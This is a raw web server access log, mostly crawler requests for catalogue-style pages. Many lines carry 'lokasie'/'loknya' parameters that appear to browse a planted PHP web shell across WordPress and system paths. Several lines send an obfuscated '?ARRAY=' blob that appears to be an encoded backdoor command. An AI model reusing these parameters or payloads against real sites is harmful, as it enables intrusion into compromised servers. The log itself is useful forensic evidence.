66.249.72.69 - - [21/Jul/2026:15:41:27 +0000] "GET /batch/fixture/fsib3v6bjhmwew3.htm HTTP/1.1" 200 30251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.69 - - [21/Jul/2026:15:41:28 +0000] "GET /detail/4609425133 HTTP/1.1" 200 29511 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.117 - - [21/Jul/2026:15:41:29 +0000] "GET /sitemap-9.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fcomment.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 33577 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.72.69 - - [21/Jul/2026:15:41:29 +0000] "GET /detail/5185962892 HTTP/1.1" 200 29701 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.117 - - [21/Jul/2026:15:41:32 +0000] "GET /sitemap-13.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fclass-wp-customize-manager.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 50830 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.72.70 - - [21/Jul/2026:15:41:33 +0000] "GET /detail/4558713328 HTTP/1.1" 200 29517 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.69 - - [21/Jul/2026:15:41:34 +0000] "GET /detail/4517103136 HTTP/1.1" 200 29853 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.117 - - [21/Jul/2026:15:41:35 +0000] "GET /sitemap-1.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fclass-wp-term.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 3351 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:15:41:11 +0000] "GET /sitemap-7.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fclass-http.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 1722 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
57.141.0.4 - - [21/Jul/2026:15:41:13 +0000] "GET /items/B394150448/ HTTP/2" 429 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
216.73.216.117 - - [21/Jul/2026:15:41:13 +0000] "GET /sitemap-1.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fclass-wp-admin-bar.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 6796 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.72.70 - - [21/Jul/2026:15:41:32 +0000] "GET /detail/2039359603 HTTP/1.1" 200 29375 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.68.247.205 - - [21/Jul/2026:15:41:36 +0000] "GET /detail/2551991410 HTTP/2" 404 3163 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
192.250.235.158 - - [21/Jul/2026:15:39:47 +0000] "GET /?ARRAY=7o2230223n313738343635313938372p2231223n22687474703n5p2s5p2s6877623235307631312r747269616465732r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313738343634383338372q3835396237636435313837613435343533343432373736303830623661343731222p2232223n226636393832313739316462646532623335343262366335653632643861373831222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n2266696p6566756r732r706870222p226175746s5s70617373223n2232302q34312q36302q36352q37312q38332q3136222p2262696r675s70617373223n2232362q34332q35372q36372q37322q38352q3138227q HTTP/1.1" 500 384 "-" "-"
66.249.72.71 - - [21/Jul/2026:15:41:47 +0000] "GET /detail/3046895904 HTTP/1.1" 200 29586 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.117 - - [21/Jul/2026:15:41:48 +0000] "GET /sitemap-5.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fnav-menu.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 12076 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:15:41:53 +0000] "GET /sitemap-13.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fms-default-constants.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 3222 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.56 - - [21/Jul/2026:15:41:54 +0000] "GET /index.php?lokasie=/bin/flock&loknya=/bin HTTP/2" 429 0 "https://www.laundrybandung.id/index.php?loknya=/bin" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.117 - - [21/Jul/2026:15:41:56 +0000] "GET /sitemap-13.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Fwidgets.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 2057 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:15:41:59 +0000] "GET /sitemap-9.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fclass-walker-category.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 4062 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.72.70 - - [21/Jul/2026:15:41:36 +0000] "GET /detail/6625912962 HTTP/1.1" 200 30251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.117 - - [21/Jul/2026:15:41:38 +0000] "GET /sitemap-9.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fms-functions.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 22975 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.72.69 - - [21/Jul/2026:15:41:38 +0000] "GET /detail/3747435629 HTTP/1.1" 200 30803 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.70 - - [21/Jul/2026:15:41:40 +0000] "GET /detail/4007091947 HTTP/1.1" 200 29612 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.69 - - [21/Jul/2026:15:41:54 +0000] "GET /detail/5534822783 HTTP/1.1" 200 30630 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.71 - - [21/Jul/2026:15:42:00 +0000] "GET /detail/2399051384 HTTP/1.1" 200 29647 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.117 - - [21/Jul/2026:15:42:05 +0000] "GET /sitemap-17.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Fwidgets.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 2057 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:15:42:07 +0000] "GET /sitemap-17.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fms-default-constants.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 3222 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
192.250.235.158 - - [21/Jul/2026:15:40:09 +0000] "GET /?ARRAY=7o2230223n313738343635323030392p2231223n22687474703n5p2s5p2s6877623235307631312r747269616465732r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313738343634383430392q3533323061653666663035646330396536646664333431333832323038633230222p2232223n226636393832313739316462646532623335343262366335653632643861373831222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n2266696p6566756r732r706870222p226175746s5s70617373223n2232302q34312q36302q36352q37312q38332q3136222p2262696r675s70617373223n2232362q34332q35372q36372q37322q38352q3138227q HTTP/1.1" 500 384 "-" "-"
66.249.72.69 - - [21/Jul/2026:15:42:09 +0000] "GET /detail/5672599512 HTTP/1.1" 200 29379 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.117 - - [21/Jul/2026:15:42:10 +0000] "GET /sitemap.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fclass-wp-textdomain-registry.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 4617 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:15:42:13 +0000] "GET /sitemap-17.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Fnetwork.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 3775 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
57.141.0.53 - - [21/Jul/2026:15:42:20 +0000] "GET /items/B393435409/ HTTP/2" 429 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
66.249.72.69 - - [21/Jul/2026:15:42:19 +0000] "GET /detail/486655821 HTTP/1.1" 200 30581 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.69 - - [21/Jul/2026:15:42:23 +0000] "GET /detail/1135065484 HTTP/1.1" 200 30130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.69 - - [21/Jul/2026:15:42:29 +0000] "GET /detail/1099805500 HTTP/1.1" 200 30148 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
207.46.13.155 - - [21/Jul/2026:15:42:30 +0000] "GET /ctg/search/similarImageSearchResultView/?ctgItemCd=87194738 HTTP/2" 404 3167 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
192.250.235.158 - - [21/Jul/2026:15:40:31 +0000] "GET /?ARRAY=7o2230223n313738343635323033312p2231223n22687474703n5p2s5p2s6877623235307631312r747269616465732r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313738343634383433312q3239323233653634363661613138643231663163323937656461323461633165222p2232223n226636393832313739316462646532623335343262366335653632643861373831222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n2266696p6566756r732r706870222p226175746s5s70617373223n2232302q34312q36302q36352q37312q38332q3136222p2262696r675s70617373223n2232362q34332q35372q36372q37322q38352q3138227q HTTP/1.1" 500 384 "-" "-"
66.249.72.69 - - [21/Jul/2026:15:42:32 +0000] "GET /detail/274262090 HTTP/1.1" 200 29757 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.69 - - [21/Jul/2026:15:42:37 +0000] "GET /detail/1950936225 HTTP/1.1" 200 29761 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.69 - - [21/Jul/2026:15:42:39 +0000] "GET /detail/2647868608?loknya=/home/vmxfzbqj/public_html/cgi-bin HTTP/1.1" 200 30225 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.69 - - [21/Jul/2026:15:42:44 +0000] "GET /detail/7013869936 HTTP/1.1" 200 30011 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.70 - - [21/Jul/2026:15:42:50 +0000] "GET /detail/1970284398 HTTP/1.1" 200 30520 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
192.250.235.158 - - [21/Jul/2026:15:40:53 +0000] "GET /?ARRAY=7o2230223n313738343635323035332p2231223n22687474703n5p2s5p2s6877623235307631312r747269616465732r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313738343634383435332q3639376230646637613665353533613833383238363933653666323065623338222p2232223n226636393832313739316462646532623335343262366335653632643861373831222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n2266696p6566756r732r706870222p226175746s5s70617373223n2232302q34312q36302q36352q37312q38332q3136222p2262696r675s70617373223n2232362q34332q35372q36372q37322q38352q3138227q HTTP/1.1" 500 384 "-" "-"
66.249.72.70 - - [21/Jul/2026:15:42:54 +0000] "GET /property/tool/ftxbialby71b9bi.htm HTTP/1.1" 200 30580 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.69 - - [21/Jul/2026:15:42:56 +0000] "GET /detail/4295866018 HTTP/1.1" 200 29474 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.69 - - [21/Jul/2026:15:42:59 +0000] "GET /detail/2920644923 HTTP/1.1" 200 31743 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.69 - - [21/Jul/2026:15:43:12 +0000] "GET /colony/component/e4ryc4f7sofdl1w.htm HTTP/1.1" 200 30060 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.117 - - [21/Jul/2026:15:43:13 +0000] "GET /sitemap-1.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Ftheme-previews.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 2664 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:15:43:15 +0000] "GET /sitemap-13.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fclass-wp-http-curl.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 5476 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
192.250.235.158 - - [21/Jul/2026:15:41:15 +0000] "GET /?ARRAY=7o2230223n313738343635323037352p2231223n22687474703n5p2s5p2s6877623235307631312r747269616465732r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313738343634383437352q3661393637643832313361323133663362646636323338666364626533646631222p2232223n226636393832313739316462646532623335343262366335653632643861373831222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n2266696p6566756r732r706870222p226175746s5s70617373223n2232302q34312q36302q36352q37312q38332q3136222p2262696r675s70617373223n2232362q34332q35372q36372q37322q38352q3138227q HTTP/1.1" 500 384 "-" "-"
216.73.216.117 - - [21/Jul/2026:15:43:18 +0000] "GET /sitemap-10.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Fupdate-core.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 13218 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:15:43:21 +0000] "GET /sitemap-19.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fcompat-utf8.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 7192 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
40.77.167.25 - - [21/Jul/2026:15:42:18 +0000] "GET /items/B391095871/ HTTP/2" 404 3173 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.25 - - [21/Jul/2026:15:42:19 +0000] "GET /detail/4323967475 HTTP/2" 404 3173 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
216.73.216.117 - - [21/Jul/2026:15:42:20 +0000] "GET /sitemap.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fcategory-template.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 15668 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:15:42:21 +0000] "GET /sitemap-10.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fclass-wp-image-editor-gd.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 6892 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:15:42:24 +0000] "GET /sitemap.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Fms-options.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 1647 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:15:42:27 +0000] "GET /sitemap-19.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Fedit-form-blocks.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 7014 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.56 - - [21/Jul/2026:15:42:55 +0000] "GET /index.php?lokasie=/bin/mknod&loknya=/bin HTTP/2" 429 0 "https://www.laundrybandung.id/index.php?loknya=/bin" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
51.75.236.139 - - [21/Jul/2026:15:43:06 +0000] "GET /detail/5137769417 HTTP/2" 404 3165 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.72.69 - - [21/Jul/2026:15:43:13 +0000] "GET /detail/5579868263 HTTP/1.1" 200 30476 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.69 - - [21/Jul/2026:15:43:18 +0000] "GET /detail/5010464033?lokasie=/home/vmxfzbqj/public_html/wp-comments-post.php&loknya=/home/vmxfzbqj/public_html HTTP/1.1" 200 29783 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.69 - - [21/Jul/2026:15:43:23 +0000] "GET /detail/4984904426 HTTP/1.1" 200 30629 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.117 - - [21/Jul/2026:15:43:33 +0000] "GET /sitemap-5.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fms-deprecated.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 8175 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:15:43:35 +0000] "GET /sitemap-17.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fclass-wp-http-curl.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 5476 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.72.69 - - [21/Jul/2026:15:43:35 +0000] "GET /detail/3266279407 HTTP/1.1" 200 31220 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.117 - - [21/Jul/2026:15:43:38 +0000] "GET /sitemap.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Ftemplate-canvas.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 1825 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
192.250.235.158 - - [21/Jul/2026:15:41:38 +0000] "GET /?ARRAY=7o2230223n313738343635323039382p2231223n22687474703n5p2s5p2s6877623235307631312r747269616465732r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313738343634383439382q6166333531316362383934363334386265366339383066306466306163393663222p2232223n226636393832313739316462646532623335343262366335653632643861373831222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n2266696p6566756r732r706870222p226175746s5s70617373223n2232302q34312q36302q36352q37312q38332q3136222p2262696r675s70617373223n2232362q34332q35372q36372q37322q38352q3138227q HTTP/1.1" 500 384 "-" "-"
66.249.72.69 - - [21/Jul/2026:15:43:40 +0000] "GET /association/ware/fbscptgb5zk6gi1.htm HTTP/1.1" 200 29630 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.117 - - [21/Jul/2026:15:43:41 +0000] "GET /sitemap-19.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fclass-wp-rewrite.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 17291 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.72.70 - - [21/Jul/2026:15:43:44 +0000] "GET /detail/1121008021 HTTP/1.1" 200 30423 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
